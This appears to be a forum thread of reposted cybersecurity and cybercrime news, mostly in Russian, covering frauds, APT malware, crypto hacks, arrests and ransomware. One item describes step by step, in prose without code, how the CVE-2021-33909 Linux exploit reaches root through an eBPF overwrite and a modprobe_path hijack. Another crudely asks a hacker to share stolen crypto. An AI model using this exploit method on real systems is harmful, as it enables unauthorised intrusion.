Установить на смартфон определенное приложение удаленного доступа являлось еще одним обязательным условием по «сохранности» средств. После того, как потерпевшая, следуя инструкции злоумышленников, разрешила им подключение к своему мобильному телефону через вышеуказанное приложение, те смогли узнать реквизиты ее банковских платежных карточек, авторизоваться от ее имени в личном кабинете системы Интернет-банкинг и дистанционно распоряжаться денежными средствами.
Таким образом в период с 4 по 16 июня 2021 года неизвестным удалось завладеть денежными средствами пенсионерки на общую сумму более 37 тысяч рублей.
По данному факту возбуждено уголовное дело по ч. 4 ст. 212 (хищение имущества путем модификации компьютерной информации, совершенное в особо крупном размере) Уголовного кодекса Республики Беларусь.
В настоящий момент проводятся следственные действия и оперативно-розыскные мероприятия, направленные на установление лиц, совершивших преступления, готовятся поручения об оказании международной правовой помощи.
Okta Security discovered a new bypass in Windows Installer (MSI) Authenticode
signature validation that could allow one to disguise an altered package as
legitimate software.
Pretty interesting read.
Hope you guys find it as interesting as I did.
__
Installer: CVE-2021-26413 ](https://sec.okta.com/articles/2021/04/uncovering- and-disclosing-signature-spoofing-vulnerability-windows)
Executive SummaryOkta Security has discovered and disclosed a new bypass in Windows Installer (MSI) Authenticode signature validation that could all
sec.okta.com
March 31, 2021 Ravie Lakshmanan
Cybersecurity researchers on Tuesday disclosed details of a sophisticated
campaign that deploys malicious backdoors for the purpose of exfiltrating
information from a number of industry sectors located in Japan.
Dubbed "A41APT" by Kaspersky researchers, the findings delve into a new slew of attacks undertaken by APT10 (aka Stone Panda or Cicada) using previously undocumented malware to deliver as many as three payloads such as SodaMaster, P8RAT, and FYAnti.
The long-running intelligence-gathering operation first came into the scene in March 2019, with activities spotted as recently as November 2020, when [reports](https://symantec-enterprise-blogs.security.com/blogs/threat- intelligence/cicada-apt10-japan-espionage) emerged of Japan-linked companies being targeted by the threat actor in over 17 regions worldwide.
The fresh attacks uncovered by Kaspersky are said to have occurred in January
2021. The infection chain leverages a multi-stage attack process, with the
initial intrusion happening via abuse of SSL-VPN by exploiting unpatched
vulnerabilities or stolen credentials.
Center to the campaign is a malware called Ecipekac ("Cake piece" in reverse,
but with a typo) that traverses a four-layer "complicated loading schema" by
making use of four files to "load and decrypt four fileless loader modules one
after the other to eventually load the final payload in memory."
While the main purpose of P8RAT and SodaMaster is to download and execute payloads retrieved from an attacker-controlled server, Kaspersky's investigation hasn't yielded any clues as to the exact malware delivered on target Windows systems.
Interestingly, the third payload, FYAnti, is a multi-layer loader module in itself that goes through two more successive layers to deploy a final-stage remote access Trojan known as QuasarRAT (or xRAT).
"The operations and implants of the campaign ... are remarkably stealthy, making it difficult to track the threat actor's activities," Kaspersky researcher Suguru Ishimaru [said](https://securelist.com/apt10-sophisticated- multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/). "The main stealth features are the fileless implants, obfuscation, anti-VM ,and removal of activity tracks."
https://thehackernews.com/2021/03/hackers-are-implanting-multiple.html
Министерство юстиции США сообщило в четверг, что инженер американской компании SpaceX Джеймс Роланд Джонс (James Roland Jones) признал себя виновным по обвинению в инсайдерской торговле в даркнете. Ему грозит максимальное наказание в виде пяти лет тюремного заключения.
Уголовное дело против Джонса из Эрмоса-Бич (штат Калифорния) было возбуждено после проведенного ФБР расследования в 2017 году. Хотя Джонс был идентифицирован как инженер SpaceX, министерство не уточнило, работает ли он в настоящее время в аэрокосмической компании и работал ли он в ней во время совершения преступления.
По данным ведомства, Джонс под ником MillionaireMike в период с 2016 по 2017 гг. покупал и продавал персональную информацию в даркнете, включая имена, адреса, даты рождения и номера социального страхования сотрудников.
В апреле 2017 года тайный сотрудник ФБР предоставил Джонсу «предполагаемую инсайдерскую информацию, связанную с публично торгуемой» компанией. «С 18 апреля 2017 года по 4 мая 2017 года Джонс и заговорщик (его имя не установлено) провели множество операций с ценными бумагами на основе этой предполагаемой инсайдерской информации», — говорится в сообщении Министерства юстиции США.
В свою очередь, Комиссия по ценным бумагам и биржам (SEC) обвинила Джонса в «совершении мошеннической схемы по торговле „инсайдерскими подсказками“» в даркнете в обмен на биткоины, что является нарушением федерального закона о ценных бумагах. По данным SEC, благодаря мошенничеству Джонс заработал $27 тыс.
Вместе с тем SEC не упомянула SpaceX, поэтому можно предположить, что предлагаемая им информация не касалась компании. SEC заявила, что это был первый случай, когда она приняла принудительные меры в связи с нарушениями законодательства о ценных бумагах в связи с операциями в даркнете.
«Этот случай показывает, что SEC может и будет преследовать нарушителей закона о ценных бумагах, где бы они не работали, даже в даркнете», — указал в заявлении директор регионального офиса SEC в Форт-Уэрте Дэвид Пивлер (David Peavler).
Компания Offensive Security выпустила Kali Linux 2023.1, первую в 2023 году версию (к тому же приуроченную к десятилетию проекта) с новым дистрибутивом Kali Purple, который предназначен для blue и purple team, то есть ориентирован на оборонительную безопасность.
В этом релизе разработчики представили множество новинок, включая:
«За прошедшие годы мы усовершенствовали то, на чем специализировались, то есть наступательную безопасность. Теперь мы начинаем переход в новую область — оборонительную безопасность, — пишут в Offensive Security. — Мы делаем предстартовый запуск ознакомительной технической версии Kali Purple. [Дистрибутив] пока находится на начальном этапе развития, и ему потребуется время, чтобы созреть. Но вы уже можете видеть направление, в котором развивается Kali, а также можете принять участие в формировании этого направления!».
Click to expand...
Хотя дистрибутив еще находится на ранних стадиях разработки, он уже включает в себя более 100 защитных инструментов, включая Malcolm, Surricata, Arkime, TheHive и Zeek, а также имеет специальную Wiki, которая поможет начать работу.
Kali Purple уже можно загрузить в виде ISO- образа для систем x64/AMD64.
Кроме того, как уже было замечено выше, в Kali 2023.1 вошли восемь новых инструментов:
Также команда разработчиков предупреждает, что в предстоящий стабильный релиз Debian внесены многочисленные изменения, и они могут вызвать проблемы с PIP, поэтому команда Kali представила временный патч, который предотвращает возможные «поломки» менеджера пакетов, а также поделилась другими методами обновления пакетов, которые предотвращают вероятные сбои.
Еще одно предупреждение касается возможных проблем с устройствами, использующими GPU Nvidia: в таких системах могут наблюдаться «тормоза», машина может перестать отвечать или зависнуть полностью.
«Для пользователей Nvidia этот релиз может оказаться не самым лучшим. Известно, что драйверы Nvidia серии 525 не работают с некоторыми моделями GPU, — поясняют разработчики. — Мы не знаем, с какими именно, но есть различные отчеты, связанные практически со всеми дистрибутивами Linux, которые начали распространять эти драйверы (включая Debian, Ubuntu и Arch Linux). Все мы затронуты, и Kali Linux не исключение».
Click to expand...
В качестве временного решения проблемы пользователям предлагается удалить драйверы Nvidia.
И, наконец, Offensive Security традиционно представила обновленные темы, которые состоят из новых обоев (включая новые обои Kali Purple), загрузочных экранов и экранов входа/блокировки.
[](https://xakep.ru/wp- content/uploads/2023/03/418514/new-kali-wallpapers.jpg)
В четверг вечером криптовалютная биржа Binance приостановила переводы средств и другие транзакции после того, как в блокчейн-сети Smart Chain (BSC) был обнаружен эксплойт. По словам гендиректора Binance Чанпэна Чжао (Changpeng Zhao), ущерб от действий хакеров составил порядка $100 млн. При этом хакеры пытались похитить ещё больше — $570 млн, однако биржа пресекла это.
«Эксплойт на кроссчейн-мосте BSC Token Hub привёл к (созданию) дополнительных
BNB. Мы попросили всех валидаторов временно приостановить работу BSC. Сейчас
проблема решается. Ваши средства в безопасности. Мы приносим извинения за
неудобства и будем предоставлять дальнейшие обновления соответственно», —
сообщил в четверг Чанпэн Чжао.
Специалисты по безопасности криптофирм BlockSec и Paradigm уточнили, что
согласно данным блокчейна было похищено 2 млн токенов Binance Coin (BNB) в
двух транзакциях, что эквивалентно $568 млн по текущему курсу BNB. Однако
хакеру удалось вывести лишь часть денег, так как транзакции были
приостановлены. Остальные токены, которые находятся в кошельке хакера, были
заморожены в сети Binance. Также сообщается, что порядка $7 млн из выведенной
суммы тоже было заморожено.
В пятницу Чанпэн Чжао заверил пользователей, что проблема уже решена. Сеть
Smart Chain снова начала работать после добавления исправлений,
предотвращающих проникновение хакеров. Так что вскоре пользователи смогут
вновь выполнять переводы и различные транзакции.
Источник:
В минувшие выходные неизвестные злоумышленники скомпрометировали аккаунт Виталика Бутерина в социальной сети X (бывший Twitter). Взломщики разметили пост от лица Бутерина, в котором предложили подписчикам бесплатные NFT, забрать которые якобы можно по ссылке. Хотя публикация продержалась всего около 20 минут, злоумышленники успели похитить у пользователей 691 000 долларов в криптовалюте.
Сообщение хакеров гласило, что памятные NFT выпущены в честь прихода прото- данкшардинга (proto- danksharding) в Ethereum, и получить свою «частичку истории» можно просто перейдя по ссылке, которая, разумеется, оказалась вредоносной.
По информации [Web 3 Is Going Just Great](https://web3isgoinggreat.com/single/vitalik-buterins-twitter-account- hacked), пост продержался всего около 20 минут. Его удалили после того, как отец Бутерина, Дмитрий, написал в X, что публикация фальшивая, его сына взломали, и тот уже пытается восстановить контроль над своей учетной записью.
Однако злоумышленникам хватило и этих 20 минут. Как сообщает блокчейн-аналитик ZachXBT, хакерам удалось похитить криптовалютные активы (в основном NFT), стоимость которых оценивается примерно в 691 000 долларов США. Дело в том, что у Виталика Бутерина почти 5 млн подписчиков в X.
После этого похитители приступили к быстрой продаже украденных NFT, одним из которых был ценный экземпляр из коллекции Cryptopunk, который был продан более чем за 200 000 долларов. В понедельник в криптокошелек хакеров так же продемонстрировал активность, свидетельствующую о том, что за выходные они получили 300 ETH (порядка 468 000 долларов США).

Некоторые из похищенных NFT
Как теперь объясняет Бутерин, перешедший в децентрализованную социальную сеть Warpcast, он стал жертвой атаки на подмену SIM-карты (SIM swap).
«Наконец-то мне восстановили учетную запись T-mobile (да, это был SIM swap, то есть кто-то применил социальную инженерию против самого T-mobile и завладел моим номером телефона). Основной урок, связанный с Twitter, заключается в следующем: для сброса пароля от учетной записи Twitter достаточно номера телефона, даже если он не используется в качестве 2ФА. Раньше я видел советы “телефонные номера небезопасны, не используйте их для аутентификации”, но не осознавал этого», — пишет Бутерин.
Click to expand...
Администратор крупнейшей немецкоговорящей торговой платформы для незаконных товаров и услуг арестован
Федеральное уголовное ведомство Германии (BKA) арестовало одного из
администраторов преступной торговой платформы «Crimenetwork». В ходе операции
были изъяты не только многочисленные доказательства и дорогостоящие
автомобили, но и активы на сумму около миллиона евро в криптовалюте.
«Crimenetwork» считалась крупнейшей немецкоговорящей онлайн-площадкой для
незаконной торговли товарами и услугами, и действовала с 2012 года. В рамках
расследования были отключены серверы платформы, которые обеспечивали её
техническую инфраструктуру.
Арест администратора и обвинения
29-летний обвиняемый, который на протяжении нескольких лет исполнял роль
технического администратора (так называемого «Techmin») платформы, был
арестован и в понедельник доставлен к судье. Он помещён под стражу. Ему
предъявлены обвинения в создании и управлении преступной торговой платформой,
что является нарушением статьи 127 Уголовного кодекса Германии. Кроме того, он
подозревается в торговле наркотиками в крупных размерах, согласно статьям 29a
и 30a Закона о наркотиках.
Платформа и её преступная деятельность
«Crimenetwork» служила рынком для продажи украденных данных, наркотиков и
поддельных документов. С момента своего основания в 2012 году она стала
основным пунктом для немецкоговорящей «подпольной экономики». На пике своей
деятельности платформа насчитывала более 100 000 пользователей и более 100
продавцов. Большинство пользователей и клиентов платформы происходили из
немецкоговорящих стран.
Оплата незаконных товаров и услуг осуществлялась через криптовалюты Bitcoin
(BTC) и Monero (XMR). С 2018 по 2024 год через «Crimenetwork» было совершено
оборота на сумму не менее 1000 BTC (около 90 миллионов евро) и более 20 000
XMR (около 3 миллионов евро). Операторы платформы получали комиссию от 1 до 5
процентов с каждой сделки, а также ежемесячные платежи от продавцов за рекламу
и лицензии на продажу.
Расследования и международное сотрудничество
Расследование проводилось совместно BKA и ZIT, а также с участием
международных правоохранительных органов, в частности прокуратуры Зеландия-
Западный Брабант и полиции Зеландия-Западный Брабант из Нидерландов. В ходе
операции были изъяты значительные объёмы данных о пользователях и транзакциях,
которые дали важные указания на преступные структуры, стоящие за платформой.
Это расследование стало ещё одной важной вехой в борьбе с онлайн-преступностью и незаконными рынками в даркнете.
Бывший администратор американской корпорации заблокировал несколько сотен серверов с целью выманить у экс-работодателя крупный выкуп. Он хорошо подготовился – чтобы его затея выгорела, он сначала сбросил пароли учетных записей администраторов, чтобы те ему не помешали. Но до конца реализовать план не удалось – вымогателя поймали и хотят бросить в тюрьму более чем на 30 лет, хотя он сам уже немолод. К моменту освобождения ему будет 92 года.
Преступление космических масштабов
Экс-инженер по базовой ИТ-инфраструктуре крупной американской корпорации оказался под арестом за успешную попытку взлома сотен серверов бывшего работодателя и требование с него выкупа, пишет портал Bleeping Computer. Ему удалось заблокировать администраторам корпорации доступ к 254 серверам под управлением Windows Server. Название корпорации в документах суда не приводится – в них она обозначается как «Жертва-1» (Victim-1).
Согласно судебным документам, в ноябре 2023 г. 57-летний инженер Дэниел Райн (Daniel Rhyne) разослал сотрудникам компании, в которой ранее работал, письмо с предупреждением о взломе корпоративной сети. В письме он написал, что заблокировал администраторам доступ к своим аккаунтам и попутно удалил все резервные копии, чтобы не было возможности восстановить информацию.
Также Райн предупредил, что будет выводить из строя по 40 серверов в день, если ему не заплатят 20 биткоинов, что на тот момент составляло около $750 тыс.
Очень коварный замысел
Расследование взлома корпоративной сети неназванной американской компании координировал специальный агент ФБР Джеймс Деннехи (James Dennehy). Следователи выяснили, что Райн в период с 9 по 25 ноября 2023 г. получил удаленный доступ к компьютерным системам компании без официального на то разрешения. При этом он использовал скомпрометированную учетную запись администратора компании.
После проникновения сеть Райн запланировал ряд задач на контролируемом домене – все они касались изменения паролей учетных записей администраторов. В общей сложности он запланировал смену паролей в 14 учетках администраторов и в 301 пользовательском профиле на значение «TheFr0zenCrew!»
Согласно судебным документам, Райн также запланировал задачи по смене паролей для двух учетных записей локальных администраторов, что отразилось на работе 254 серверов. Помимо этого, он решил сменить пароли еще двух локальных администраторов, что повлияло бы на 3284 рабочих станции в сети его бывшего работодателя.
Но этим Райн ограничиваться не стал. Он внес в планировщик задач отключение случайных серверов в течение нескольких дней в декабре 2023 г.
Одна ошибка – и хакер пойман
Райн прокололся на том, что для взлома использовал скрытую виртуальную машину, к которой подключался, как выяснили следователи, со своего личного ноутбука, используя личную учетную запись. На его ноутбуке позже обнаружилась история веб-серфинга – как оказалось, 22 ноября 2023 г. Райн искал в Сети информации о том, как удалить учетные записи домена, очистить журналы Windows и изменить пароли пользователей домена с помощью командной строки.
Неделей ранее, 15 ноября 2023 г., Райн выполнял похожий поиск в интернете на своем ноутбуке. Один из его запросов, сделанных в этот день – это «командная строка для изменения пароля локального администратора», другой – «командная строка для удаленного изменения пароля локального администратора».
«25 ноября 2023 г. примерно в 16:00 по восточноевропейскому времени сетевые администраторы, работающие в Victim-1, начали получать уведомления о сбросе пароля для учетной записи администратора домена Victim-1, а также для сотен учетных записей пользователей Victim-1. Вскоре после этого сетевые администраторы Victim-1 обнаружили, что все остальные учетные записи администраторов домена Victim-1 были удалены, тем самым лишив администратора домена доступа к компьютерным сетям Victim-1», – указано в документах суда.
Престарелый киберпреступник
Промежуточным итогом расследования стал арест Райна, состоявшийся 27 августа 2024 г. На этот момент ему было 57 лет. Правда, после первой же явки в суд в Канзас-Сити (США) он был временно освобожден из-под стражи, пишет Bleeping Computer.
Но при этом Райну предъявили обвинения в вымогательстве, преднамеренном повреждении компьютера и мошенничестве с использованием электронных средств связи. Если по решению суда его признают виновным, перед ним замаячит перспектива провести в тюрьме до 35 лет своей жизни. Это максимальное наказание, которое его ждет, не считая штраф в размере $750 тыс., то есть Райн рискует освободиться в возрасте 92 лет.
Wasabi wallet
После многих лет неустанной работы над повышением конфиденциальности биткоина компания zkSNACKs, инициатор разработки кошелька Wasabi Wallet, закрывает свой сервис координации коинджоин, начиная с 1 июня 2024 года.
Это решение было принято после тщательного обдумывания и с тяжелым сердцем. На протяжении всей нашей истории мы всегда старались действовать в условиях правовой ясности. На данный момент нам необходимо получить больше определенности, прежде чем двигаться дальше".
Кошелек Wasabi продолжит функционировать как обычный биткоин-кошелек, пользователи смогут генерировать приватные ключи для получения и отправки биткоинов. Даже без coinjoins архитектура фильтрации на стороне клиента, интеграция Tor и выбор монет делают Wasabi самым приватным кошельком из всех существующих. Однако природа блокчейна биткоина не позволяет пользователям получить полную конфиденциальность без coinjoins.
Это также затрагивает пользователей других клиентов кошельков, которые подключаются к координатору zkSNACKs, таких как Trezor Suite и BTCPayServer.
Wasabi Wallet является свободным программным обеспечением с открытым исходным кодом и будет продолжать поддерживаться. Любой желающий может внести свой вклад, открыть новые проблемы, отправить запросы на исправление или даже форкнуть его. zkSNACKs будет финансировать постоянную поддержку основных функций Wasabi Wallet.
Когда кошелек Wasabi Wallet был запущен в 2018 году, приватность биткоина была лишь идеей, мечтой шифропанков. После нескольких лет исследований, проб и ошибок мы доказали, что биткоин можно использовать в качестве анонимных денег в полностью суверенном режиме. Coinjoin позволяет мирным, безопасным и эффективным способом вернуть финансовую конфиденциальность. Мы добились успеха.
Настанет день, когда кто-нибудь напишет код, который усовершенствует все свойства хороших денег. А пока давайте будем благодарны за то, чего мы достигли вместе, и будем помнить о предстоящих трудностях.
Источник - [https://blog.wasabiwallet.io/zksnac...ts-coinjoin-coordination- service-1st-of-june/](https://blog.wasabiwallet.io/zksnacks-is-discontinuing- its-coinjoin-coordination-service-1st-of-june/)
Sparrow Wallet
В свете последних событий была выпущена версия Sparrow v1.9.0, в которой удален клиент Whirlpool и другие функции, связанные с Soroban. Все кошельки и аккаунты по-прежнему доступны", - объявил Sparrow Wallet.
Источник - https://www.nobsbitcoin.com/sparrow-wallet-v1-9-0/
Что такое Soroban?
Soroban - это инструмент шифрованной связи с открытым исходным кодом, не зависящий от приложений, разработанный Samourai Wallet несколько лет назад. Изначально Soroban использовался для обеспечения бесперебойной безопасной связи между отдельными кошельками с целью создания совместных одноранговых транзакций. С течением времени мы продолжали совершенствовать Soroban и использовать его в качестве коммуникационного шлюза, необходимого для децентрализованной координации Whirlpool. В ближайшие недели будет выпущено больше информации и руководств, которые помогут вам запустить собственные узлы Soroban, чтобы обеспечить надежность децентрализованной координационной связи Whirlpool.
Обсуждение безопасного кошелька на ХСС
Департамент киберполиции наладил действенное сотрудничество в сфере противодействия киберпреступности с правоохранительными органами стран Евросоюза, Соединенных Штатов Америки и ряда других стран. В течение текущего года работники департамента приняли участие в 13 международных специальных полицейских операциях по разоблачению киберпреступников. Об этом сообщили в киберполиции на запрос ZN.UA.
«Ярким примером является международная операция« EMOTET », в какой именно Украина выступила главным локомотивом. Разоблачили транснациональную группировку хакеров, среди которых двое граждан Украины, в распространении опасного в мире компьютерного вируса. Хакеры с помощью вирусного программного обеспечения осуществляли массовые вмешательства в работу серверов частных и государственных учреждений стран Европы и Соединенных Штатов Америки. В результате такой «деятельности» иностранные банки и банки понесли 2,5 миллиарда долларов убытков. Спецоперация по разоблачению проходила во взаимодействии с правоохранительными органами Германии, США, Великобритании и Нидерландов », - говорится в ответе.
Отмечается, что инфраструктура «EMOTET» включала серверы, расположенные по всему миру, и фактически была БОТ-сетью. «Вирус» распространялся путем спам- рассылок, через документы Word, Excel и т. Вредоносное программное обеспечение похищала персональные данные пользователей, в том числе пароли, логины, историю браузера, платежные и банковские данные и тому подобное. В дальнейшем злоумышленники перечисляли деньги на свои подконтрольные счета.
«Следующим примером международного сотрудничества является разоблачение хакера из Тернопольщины, который создал и администрировал одну из крупнейших в мире фишинговых платформ. Фишинговые атаки были нацелены на финансовые учреждения и слом почтовых сервисов. В результате атак пострадали банки 11 стран мира. Хакера уличили в ходе международной спецоперации с правоохранительными Соединенных Штатов Америки и Австралии », - детализируют в ведомстве.
Добавляется, что разработанная хакером админпанель позволяла контролировать учетные записи пользователей, которые зарегистрировались на скомпрометированных ресурсах и вводили свои платежные данные. В дальнейшем эти данные получали хакерские группировки и использовали в своих целях. Материалы этого уголовного производства уже направлены в суд с обвинительным актом.
«На днях киберполиция совместно с работниками правоохранительных органов Республики Корея и США разоблачила хакерскую группировку в распространении вируса-шифровальщика и нанесении иностранным компаниям полмиллиарда долларов убитков. За помощью вредоносной программы-вымогателя" Clop "шесть фигурантов криптовали данные, находившейся на информационных носителях компаний в Республике Корее и США. По дешифрованию данных требовали «выкуп», а в случае неуплаты - угрожали обнародовать конфиденциальные данные потерпевших », - отметили в киберполиции.
**Группировка Fonix прекратила свою деятельность, опубликовав мастер-ключ дешифрования
Дешифратор**
Группировка Fonix Ransomware прекратила свою работу и выложила мастер-ключ дешифрования, позволяющий жертвам бесплатно восстанавливать свои файлы.
Программа-вымогатель Fonix, также известная как Xinof и FonixCrypter, начала свою работу в июне 2020 года и с тех пор постоянно шифровала компьютеры жертв. Деятельность группировки не была такой активной, как у группировок REvil, Netwalker или STOP, но начиная с ноября 2020 года она немного выросла, как показано на представленном ниже графике.
Сегодня днем пользователь Twitter, утверждающий, что он является администратором программы-вымогателя Fonix, объявил, что группировка завершила свою деятельность.
Сообщение, представленное на изображении, гласит:
Я один из администраторов команды Fonix.
вы знаете о команде Fonix, но мы решили закрыться.
мы должны использовать свои способности для добрых дел и помогать другим.
Также полностью удален источник кода rans0mware, хотя некоторые члены команды
не согласны с закрытием проекта, например, администратор канала Telegram,
который пытается обмануть людей, продавая поддельный источник кода и фальшивые
данные.
Как бы то ни было, главный администратор решил пересмотреть всю предыдущую
работу и бесплатно расшифровать все зараженные системы.
И ключ дешифрования будет доступен общественности.
Окончательное заявление команды будет опубликовано в ближайшее время.
С уважением, FonixTeam
Согласно сообщению, некоторые из «участников» программы-вымогателя были недовольны тем, что программа закрывается.
Завершение работы может привести к тому, что оставшиеся участники присоединятся к другим партнерским программам-вымогателям или разделятся и создадут новые команды.
Мастер-ключи работают, дешифратор в беспорядке
В другом твите администратор Fonix поделился ссылкой на архив RAR под названием «Fonix_decrypter.rar», содержащий как дешифратор, так и главный мастер-ключ дешифрования.
Этот инструмент дешифрования не является дешифратором, который может использоваться жертвой для простого дешифрования своих файлов, а является инструментом администратора, используемым внутри команды вымогателей.
Большинство программ-вымогателей позволяют жертвам отправить несколько зашифрованных файлов, которые они бесплатно расшифруют, чтобы доказать, что они могут это сделать.
Расшифровщик, выпущенный сегодня вечером, является инструментом команды Fonix Ransomware для выполнении этой бесплатной тестовой расшифровки и не позволяет жертве расшифровать весь компьютер.
Даже с учетом того, что он может расшифровать только один файл одновременно, судя по нашим тестам дешифратора, он имеет очень запутанные инструкции и подвержен сбоям.
Хорошая новость заключается в том, что Майкл Гиллеспи (Michael Gillespie) сообщил BleepingComputer, что мастер-ключи работают, хотя и не со всеми версиями Fonix.
Тем не менее, дешифратор Emisosft расшифрует все версии, включая расширения файлов .Fonix, .FONIX, .repter, .XINOF.
Пока не известно, когда будет выпущен дешифратор, но если вы стали жертвой этой программы-вымогателя, решение будет доступно для вас в ближайшее время.
Источник: https://www.bleepingcomputer[.]com/...huts-down-and-releases- master-decryption-key/
Сегодня наебнули биржу Coinbase
Всего пострадали 6000 пользователей. Представители биржи не комментируют, как хакеры получили доступ к системным протоколам. Сообщается, что злоумышленники обнаружили дыру в процессе восстановления учётных записей. Это позволило им переписать на себя кошельки, а после снять с них всю криптовалюту. Точной суммы ущерба нет, но Coinbase уверяет, что все монеты будут возмещены. Якобы, выплаты начались, но для тех, кто доверил свои накопления бирже, это явно плохое утешение. Мало того, что нет даже приблизительных сроков возвращения, а биржа явно пытается замять дело.
Одновременно с этим представители Coinbase уверяют, что первоначально проблема была на стороне пользователей. Они уверены, что хакеры где-то раздобыли 6 тысяч учётных записей и пароли к ним. В такое верится с большим трудом, поэтому более вероятно, что дыра действительно была внутри биржи. На данный момент Coinbase утверждает, что все протоколы были обновлены, а значит никакой опасности деньги держателей не подвергаются. Все пострадавшим выслали инструкцию, призванную обеспечить безопасность аккаунта в дальнейшем, а также предложили один из способов возмещения украденных средств.
P.S Хакер взломавший эту биржу, если ты читаешь этот пост, поделись
пожалуйста награбленным, ну зачем тебе столько, буду рад любой сумме
bc1qqwxs5y5wx89vlrlkwvmxmu7phytwfd6et080hx
Исследователи безопасности из компании Qualys [раскрыли](https://blog.qualys.com/vulnerabilities-threat- research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in- linuxs-filesystem-layer-cve-2021-33909) [детали](https://blog.qualys.com/vulnerabilities-threat- research/2021/07/20/cve-2021-33910-denial-of-service-stack-exhaustion-in- systemd-pid-1) двух уязвимостей, затрагивающих ядро Linux и системный менеджер systemd. [Уязвимость в ядре](https://www.openwall.com/lists/oss- security/2021/07/20/1) ([CVE-2021-33909](https://security- tracker.debian.org/tracker/CVE-2021-33909)) позволяет локальному пользователю добиться выполнения кода с правами root через манипуляции с каталогами большой вложенности.
Опасность уязвимости усугубляется тем, что исследователям удалось подготовить рабочие эксплоиты, работающие в Ubuntu 20.04/20.10/21.04, Debian 11 и Fedora 34 в конфигурации по умолчанию. Отмечается, что другие дистрибутивы не проверялись, но теоретически тоже подвержены проблеме и могут быть атакованы. Полный код эксплоитов обещают опубликовать после повсеместного устранения проблемы, [а пока доступен](https://www.qualys.com/research/security- advisories/) лишь ограниченный в функциональности прототип, вызывающий крах системы. Проблема проявляется с июля 2014 года и затрагивает выпуски ядра начиная с 3.16. Исправление уязвимости было скоординировано с сообществом и принято в состав ядра 19 июля. Основные дистрибутивы уже сформировали обновления пакетов с ядром (Debian, Ubuntu, Fedora, RHEL, SUSE, Arch).
Уязвимость вызвана отсутствием проверки результата преобразования типа size_t в int перед выполнением операций в коде seq_file, осуществляющем создание файлов из последовательности записей. Отсутствие проверки может привести к записи в область вне границ буфера при создании, монтировании и удалении структуры каталогов с очень большим уровнем вложенности (размер пути более 1 ГБ). В итоге, атакующий может добиться записи 10-байтовой строки "//deleted" со смещением "- 2 ГБ - 10 байт", указывающим на область, непосредственно предшествующую выделенному буферу.
Подготовленный эксплоит требует для работы 5 ГБ памяти и 1 миллион свободных inode. Работа эксплоита сводится к созданию через вызов mkdir() иерархии из около миллиона вложенных каталогов для достижения размера файлового пути, превышающего 1 ГБ. Данный каталог монтируется через bind-mount в отдельном пространстве имён идентификаторов пользователей (user namespace), после чего запускается функция rmdir() для его удаления. Параллельно создаётся поток, загружающий небольшую eBPF-программу, который блокируется на стадии после проверки псевдокода eBPF, но до его JIT-компиляции.
В непривилегированном пространстве имён идентификаторов пользователей открывается файл /proc/self/mountinfo и начинается чтение длинного пути каталога, примонтированного при помощи bind-mount, что приводит к записи строки "//deleted" в область до начала буфера. Позиция для записи строки выбирается таким образом, что она перезаписывает инструкцию в уже проверенной, но ещё не скомпилированной программе eBPF.
Далее на уровне программы eBPF неконтролируемая запись вне буфера трансформируется в управляемую возможность чтения и записи в другие структуры ядра через манипуляцию со структурами btf и map_push_elem. В итоге, эксплоит определяет местоположение буфера modprobe_path[] в памяти ядра и перезаписывает в нём путь "/sbin/modprobe", что позволяет инициировать запуск любого исполняемого файла с правами root в случае выполнения вызова request_module(), который выполняется, например, при создании сокета netlink.
Исследователями приводится несколько обходных методов защиты, которые эффективны только для конкретного эксплоита, но не устраняют саму проблему. Рекомендуется установить параметр "/proc/sys/kernel/unprivileged_userns_clone" в значение 0 для запрета монтирования каталогов в отдельном пространстве имён идентификаторов пользователей, а также "/proc/sys/kernel/unprivileged_bpf_disabled" в 1 для запрета загрузки программ eBPF в ядро.
Примечательно, что разбирая альтернативный вариант атаки, связанный с использованием механизма FUSE вместо bind-mound для монтирования большого каталога, исследователи [натолкнулись](https://www.openwall.com/lists/oss- security/2021/07/20/2) на ещё одну уязвимость ([CVE-2021-33910](https://security- tracker.debian.org/tracker/CVE-2021-33910)), затрагивающую системный менеджер systemd. Оказалось, что при попытке монтирования через FUSE каталога c размером пути, превышающим 8 МБ, в управляющем процессе инициализации (PID1) наступает исчерпание памяти стека и крах, который приводит систему в состояние "panic".
Проблема связана с тем, что systemd отслеживает и разбирает содержимое /proc/self/mountinfo, и обрабатывает каждую точки монтирования в функции unit_name_path_escape(), в которой выполняется операция strdupa(), размещающая данные в стеке, а не в динамически выделяемой памяти. Так как максимальный размер стека ограничен через RLIMIT_STACK обработка слишком большого пути к точке монтирования приводит к краху процесса PID1 и остановке работы системы. Для атаки можно использовать простейший модуль FUSE в сочетании с использованием в качестве точки монтирования каталога с большим уровнем вложенности, размер пути в котором превышает 8 МБ.
Проблема проявляется начиная с systemd 220 (апрель 2015), уже устранена в основном репозитории systemd и исправлена в дистрибутивах (Debian, Ubuntu, Fedora, RHEL, SUSE, Arch). Примечательно, что в выпуске systemd 248 эксплоит не работает из-за ошибки в коде systemd, приводящей к сбою при обработке /proc/self/mountinfo.
Также интересно, что в 2018 году возникла похожая ситуация и при попытке написать эксплоит к уязвимости CVE-2018-14634 в ядре Linux, исследователи Qualys натолкнулись на [три критические уязимости](https://seclists.org/oss- sec/2019/q1/54) в systemd.
«Сотрудниками Управления уголовного розыска ГУ МВД России по г. Москве во взаимодействии со специалистами Group-IB пресечена деятельность организованной группы, специализировавшейся на хищении денежных средств граждан дистанционным способом.
Предварительно установлено, что злоумышленники на популярных интернет- площадках размещали объявления о продаже объектов недвижимости, премиальных автомобилей и медицинских масок. Заинтересовавшихся этими предложениями граждан сообщники просили подтвердить платежеспособность. Для этого им предлагалось перечислить некоторую сумму кому-либо из своих знакомых или родственников, используя определенные платежные системы. А затем предоставить продавцу квитанцию о финансовой операции.
В дальнейшем, узнав таким образом персональные данные получателей переводов, соучастники изготавливали на их имена поддельные паспорта, с которыми посещали кредитно-финансовые организации и снимали со счетов граждан денежные средства.
По данным фактам возбуждено семь уголовных дел по признакам преступления, предусмотренного статьей 159 УК РФ, которые в настоящее время соединены в одно производство.
В результате оперативно-розыскных мероприятий на территории города Москвы, а также Московской, Саратовской и Волгоградской областей сотрудниками Московского уголовного розыска при участии Росгвардии задержаны девять подозреваемых. Четверо фигурантов заключены под стражу. Остальным избрана мера пресечения в виде подписки о невыезде и надлежащем поведении.
